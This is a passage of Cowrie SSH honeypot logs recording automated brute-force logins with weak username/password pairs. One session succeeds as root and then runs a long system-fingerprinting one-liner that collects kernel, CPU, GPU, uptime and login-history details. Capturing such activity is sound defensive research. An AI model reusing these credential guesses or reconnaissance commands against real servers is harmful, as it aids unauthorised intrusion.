\"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.114789Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.115282Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.116206Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.117546Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.118234Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.119139Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.120093Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.120716Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.121531Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.122113Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.122872Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.123414Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.451275Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.452167Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:51:26.453155Z","src_ip":"134.199.174.250","session":"e59a96782c1f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41156,"dst_ip":"1.2.3.4","dst_port":22,"session":"acf39574ab83","protocol":"ssh","message":"New connection: 212.227.235.229:41156 (1.2.3.4:22) [session: acf39574ab83]","sensor":"my-vps","timestamp":"2025-09-08T12:51:32.671040Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:51:32.672061Z","src_ip":"212.227.235.229","session":"acf39574ab83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:51:32.961249Z","src_ip":"212.227.235.229","session":"acf39574ab83"}
{"eventid":"cowrie.login.failed","username":"sonar","password":"Password1","message":"login attempt [sonar/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:51:34.163307Z","src_ip":"212.227.235.229","session":"acf39574ab83"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:51:35.456467Z","src_ip":"212.227.235.229","session":"acf39574ab83"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":59624,"dst_ip":"1.2.3.4","dst_port":22,"session":"31f2a069e517","protocol":"ssh","message":"New connection: 139.59.14.27:59624 (1.2.3.4:22) [session: 31f2a069e517]","sensor":"my-vps","timestamp":"2025-09-08T12:51:38.890444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:51:38.891540Z","src_ip":"139.59.14.27","session":"31f2a069e517"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:51:39.199102Z","src_ip":"139.59.14.27","session":"31f2a069e517"}
{"eventid":"cowrie.login.failed","username":"builder","password":"123","message":"login attempt [builder/123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:51:40.462223Z","src_ip":"139.59.14.27","session":"31f2a069e517"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:51:41.766499Z","src_ip":"139.59.14.27","session":"31f2a069e517"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40520,"dst_ip":"1.2.3.4","dst_port":22,"session":"62c11b469b75","protocol":"ssh","message":"New connection: 212.227.235.229:40520 (1.2.3.4:22) [session: 62c11b469b75]","sensor":"my-vps","timestamp":"2025-09-08T12:51:44.093387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:51:44.094921Z","src_ip":"212.227.235.229","session":"62c11b469b75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:51:44.220579Z","src_ip":"212.227.235.229","session":"62c11b469b75"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"password","message":"login attempt [nagios/password] failed","sensor":"my-vps","timestamp":"2025-09-08T12:51:44.766565Z","src_ip":"212.227.235.229","session":"62c11b469b75"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:51:45.894398Z","src_ip":"212.227.235.229","session":"62c11b469b75"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38658,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccc62d539303","protocol":"ssh","message":"New connection: 212.227.235.229:38658 (1.2.3.4:22) [session: ccc62d539303]","sensor":"my-vps","timestamp":"2025-09-08T12:51:47.540148Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:51:47.540949Z","src_ip":"212.227.235.229","session":"ccc62d539303"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:51:47.714191Z","src_ip":"212.227.235.229","session":"ccc62d539303"}
{"eventid":"cowrie.login.failed","username":"operator","password":"Welcome1","message":"login attempt [operator/Welcome1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:51:48.414820Z","src_ip":"212.227.235.229","session":"ccc62d539303"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:51:49.591260Z","src_ip":"212.227.235.229","session":"ccc62d539303"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":58038,"dst_ip":"1.2.3.4","dst_port":22,"session":"3aa1554c9d43","protocol":"ssh","message":"New connection: 134.199.174.250:58038 (1.2.3.4:22) [session: 3aa1554c9d43]","sensor":"my-vps","timestamp":"2025-09-08T12:51:58.497889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:51:58.498779Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:51:58.926545Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty123","message":"login attempt [root/qwerty123] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:51:59.960295Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:52:00.848000Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.848838Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.849806Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.850866Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.852371Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.853093Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.853805Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.855231Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.855687Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.856219Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.856676Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.857266Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T12:52:00.857839Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T12:52:01.191762Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:01.192863Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:01.194202Z","src_ip":"134.199.174.250","session":"3aa1554c9d43"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:52:01.403257Z","src_ip":"212.227.125.160","session":"397a94050256"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":50006,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae1d53354e23","protocol":"ssh","message":"New connection: 134.199.174.250:50006 (1.2.3.4:22) [session: ae1d53354e23]","sensor":"my-vps","timestamp":"2025-09-08T12:52:31.329152Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:52:31.330108Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T12:52:31.709751Z","src_ip":"134.199.174.250","session":"ae1d53354e23"}
